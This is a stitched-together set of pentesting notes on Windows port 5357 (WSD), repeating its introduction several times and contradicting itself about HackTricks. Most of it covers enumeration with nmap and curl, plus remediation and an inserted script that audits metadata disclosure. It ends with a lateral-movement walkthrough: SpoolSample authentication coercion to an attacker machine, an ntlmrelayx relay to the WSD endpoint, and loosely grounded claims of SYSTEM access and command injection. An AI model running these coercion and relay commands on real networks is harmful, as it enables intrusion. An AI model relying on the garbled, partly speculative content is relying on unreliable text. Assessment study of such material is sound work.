# Service discovery
nmap -p 5357 <target>

Port 5357 is used by the Web Services for Devices (WSD) API — a Microsoft implementation that allows networked devices (printers, scanners, cameras, IoT appliances) and Windows hosts to discover and communicate with each other over HTTP-like endpoints. Because WSD exposes device management and discovery functionality, misconfigured or exposed WSD endpoints can reveal device information, let administrators or services be manipulated remotely, or provide an entry point for lateral movement.

Port 5357 is used by WSDAPI for device discovery and control (e.g., network scanners, printers, media servers). It is part of WSD (Web Services on Devices), Microsoft's implementation of the Devices Profile for Web Services (DPWS).

# Using wsd-client tools (if installed)
wsdd – discover

Port 5357 is primarily associated with Web Services for Devices (WSDAPI), a Microsoft implementation used for discovering and communicating with network-connected devices like printers and scanners over HTTP.

# The Role of Port 5357

On modern Windows systems, Port 5357 (TCP) acts as a local web server for this service. It allows devices to advertise their presence and services on a local network without manual configuration. While useful for seamless hardware integration, it often presents a surface for information gathering during a security assessment.

# Security Implications and Pentesting

According to methodologies found on resources like HackTricks, every open port is a potential entry point or data source. For Port 5357, the primary risks include:

Information Disclosure: The service can leak metadata such as device hostnames, manufacturer details, and network paths. Attackers use this for fingerprinting the internal network to identify specific Windows versions or hardware models.

Vulnerability Surface: Historically, this service has been susceptible to memory corruption. For example, Microsoft Security Bulletin MS09-063 addressed a critical vulnerability where specially crafted headers could lead to remote code execution.

Lateral Movement: By interacting with WSD, an attacker might identify other vulnerable devices on the subnet that wouldn't otherwise be visible through standard scanning.

# Practical Assessment Steps

If you encounter Port 5357 during a scan, consider the following:

Identify the Process: Use commands like netstat -anb | find "5357" to verify that the system is actively listening and to confirm it is indeed the Windows WSD service.

Service Probing: Attempt to browse the port via HTTP. While it may not serve a traditional webpage, it may respond with XML data or SOAP responses that reveal device identity.

Network Context: Note that this port is typically open in unmanaged or small office networks where "Network Discovery" is enabled. In highly secured environments, hardening recommendations suggest blocking this port at the firewall level to prevent unnecessary information leakage.

Port 5357 is typically associated with the Web Services for Devices API (WSDAPI), a Microsoft implementation of the WS-Discovery protocol. It allows devices like printers and scanners to be automatically discovered on a local network.

While HackTricks does not currently have a dedicated page for Port 5357, the port is an extension of standard Windows network discovery services. Here is the technical breakdown for security assessment and enumeration.

# Port 5357 Service Details

Protocol: TCP

Service: Web Services for Devices (WSD) / wsdapi

Process: Often identified as mshttpapi or part of the Windows HTTP Server Stack.

Function: It provides an HTTP-based discovery mechanism. When accessed via a browser, it may return a "404 Not Found" or a simple status message if the service is active but not configured to serve a root page.

# Enumeration & Pentesting Approach

If you encounter Port 5357 during a scan, you can use these methods to gather more information:

Banner Grabbing & Nmap Scanning: Identify the specific version of the HTTP server running on the port.

nmap -sV -p 5357 <target>

Information Leakage Check: Port 5357 has been noted as a potential source for information leaks. Use tools like curl to check for XML responses that might reveal device names, manufacturer details, or network configurations.

curl -v http://<target>:5357/

Cross-Referencing WS-Discovery (UDP 3702): Since 5357 is the HTTP unicast part of WSD, it is often paired with UDP port 3702, which handles multicast discovery. Pentesting the UDP discovery service can often provide more detailed device information than the TCP port alone.

# Vulnerability Context

System Identification: If this port is open, it strongly indicates the target is a Windows-based system (Vista or later) with network discovery enabled.

Attack Surface: While there are no widespread "one-click" exploits for Port 5357 itself, it increases the target's attack surface by confirming the operating system and potentially leaking internal metadata about connected hardware.

Remediation: If network discovery is not required, this service can be disabled by turning off "Network Discovery" in the Windows Sharing settings or blocking the port via Windows Defender Firewall.



nmap -sV -sC -p5357 10.10.10.5

Output might show:

5357/tcp open  http   Microsoft HTTPAPI httpd 2.0
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0

The metadata URL is XML that contains actions (operations) the device supports.

curl http://10.10.10.5:5357/wsd/3f8c2a1b/metadata

Look for <wsdp:Get> – this allows you to request internal device info.
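To audit what a WSD endpoint on your own network discloses to unauthenticated clients, the following added example (not part of the original page) parses a DPWS metadata response and lists the identity fields and hosted services it reveals. The sample XML is constructed and trimmed; the namespaces are the standard DPWS, WS-MetadataExchange and WS-Addressing ones, and `audit_metadata` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

# Standard DPWS, WS-MetadataExchange and WS-Addressing namespaces.
NS = {"mex": "http://schemas.xmlsoap.org/ws/2004/09/mex",
      "wsdp": "http://schemas.xmlsoap.org/ws/2006/02/devprof",
      "wsa": "http://schemas.xmlsoap.org/ws/2004/08/addressing"}
# Identity fields that make fingerprinting easy when served unauthenticated.
SENSITIVE = {"FriendlyName", "SerialNumber", "FirmwareVersion",
             "Manufacturer", "ModelName", "ModelNumber"}

# Constructed, trimmed sample response (not captured from a real device).
SAMPLE = """<mex:Metadata xmlns:mex="http://schemas.xmlsoap.org/ws/2004/09/mex"
 xmlns:wsdp="http://schemas.xmlsoap.org/ws/2006/02/devprof"
 xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing">
 <mex:MetadataSection><wsdp:ThisModel>
  <wsdp:Manufacturer>Example Corp</wsdp:Manufacturer>
  <wsdp:ModelName>ExamplePrint 100</wsdp:ModelName>
 </wsdp:ThisModel></mex:MetadataSection>
 <mex:MetadataSection><wsdp:ThisDevice>
  <wsdp:FriendlyName>Finance-Printer-2F</wsdp:FriendlyName>
  <wsdp:FirmwareVersion> 1.0.0-test </wsdp:FirmwareVersion>
  <wsdp:SerialNumber></wsdp:SerialNumber>
 </wsdp:ThisDevice></mex:MetadataSection>
 <mex:MetadataSection><wsdp:Relationship><wsdp:Hosted>
  <wsa:EndpointReference><wsa:Address>http://192.0.2.10:5357/wsd/print</wsa:Address></wsa:EndpointReference>
  <wsdp:Types>wprt:PrinterServiceType</wsdp:Types>
 </wsdp:Hosted></wsdp:Relationship></mex:MetadataSection>
</mex:Metadata>"""

def audit_metadata(xml_text, max_bytes=1_000_000):
    """Return (disclosed identity fields, hosted services) from DPWS metadata."""
    # Device responses are untrusted: cap the size and refuse DTDs, because
    # ElementTree does not limit entity expansion.
    if len(xml_text) > max_bytes or "<!DOCTYPE" in xml_text:
        raise ValueError("refusing oversized or DTD-bearing metadata")
    root = ET.fromstring(xml_text)
    fields = {}
    for section in ("ThisModel", "ThisDevice"):
        for node in root.iterfind(f".//wsdp:{section}/*", NS):
            name = node.tag.split("}", 1)[-1]   # strip the {namespace} prefix
            value = (node.text or "").strip()
            if name in SENSITIVE and value:     # empty elements leak nothing
                fields[name] = value
    hosted = [(h.findtext("wsdp:Types", "", NS).strip(),
               h.findtext(".//wsa:Address", "", NS).strip())
              for h in root.iterfind(".//wsdp:Hosted", NS)]
    return fields, hosted

if __name__ == "__main__":
    print(audit_metadata(SAMPLE))
```

Any field returned here is visible to every host that can reach the port, which is the case for restricting 5357 to the segments that actually need device discovery.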

You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.

Step 1: Coerce Authentication Using SpoolSample.exe:

SpoolSample.exe TARGET-50 AttackerPC

This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.

Step 2: Relay to WSD

ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support

If successful, you might get device control or even SYSTEM.

Step 3: Command Injection via WSD Action

Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).
